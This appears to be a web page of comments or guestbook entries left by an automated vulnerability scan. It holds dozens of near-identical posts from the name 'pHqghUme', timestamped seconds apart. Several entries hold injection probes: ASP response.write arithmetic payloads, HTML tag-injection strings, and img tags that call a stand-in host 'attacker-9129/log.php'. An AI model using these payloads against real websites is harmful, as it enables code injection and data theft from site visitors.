  1


 • pHqghUme

  2021-05-06 09:34:47


  1


 • pHqghUme

  2021-05-06 09:34:43


  '+response.write(9359512*9814528)+'


 • pHqghUme

  2021-05-06 09:34:43


  "+response.write(9359512*9814528)+"


 • pHqghUme

  2021-05-06 09:34:42


  response.write(9359512*9814528)


 • '+response.write(9495786*9567993)+'

  2021-05-06 09:34:41


  1


 • "+response.write(9495786*9567993)+"

  2021-05-06 09:34:41


  1


 • pHqghUme

  2021-05-06 09:34:40


  1


 • response.write(9495786*9567993)

  2021-05-06 09:34:40


  1


 • pHqghUme

  2021-05-06 09:34:39


  1


 • pHqghUme

  2021-05-06 09:34:39


  1


 • pHqghUme

  2021-05-06 09:34:38


  1


 • pHqghUme

  2021-05-06 09:34:38


  1


 • pHqghUme

  2021-05-06 09:34:38


  1


 • pHqghUme

  2021-05-06 09:33:26


  1Cd8kFYXGO


 • 1BaYxPrtnYO

  2021-05-06 09:33:25


  1


 • 1BaYxPrtnYO

  2021-05-06 09:33:07


  1


 • 1BaYxPrtnYO

  2021-05-06 09:32:24


  1


 • pHqghUme

  2021-05-06 09:32:23


  1


 • pHqghUme

  2021-05-06 09:32:23


  1


 • pHqghUme

  2021-05-06 09:28:29


  1


 • pHqghUme

  2021-05-06 09:28:07


  1


 • pHqghUme

  2021-05-06 09:23:41


  1


 • pHqghUme

  2021-05-06 09:23:27


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • pHqghUme

  2021-05-06 05:39:48


  1<zWJ1NR<


 • pHqghUme<vHFnlj<

  2021-05-06 05:39:45


  1


 • pHqghUme

  2021-05-06 05:39:40


  1<img sRc='http://attacker-9129/log.php?


 • pHqghUme<img sRc='http://attacker-9443/log.php?

  2021-05-06 05:39:37


  1


 • pHqghUme

  2021-05-06 05:39:22


  1<FGpsJd x=9993>


 • pHqghUme<1jCr5i x=9826>

  2021-05-06 05:39:16


  1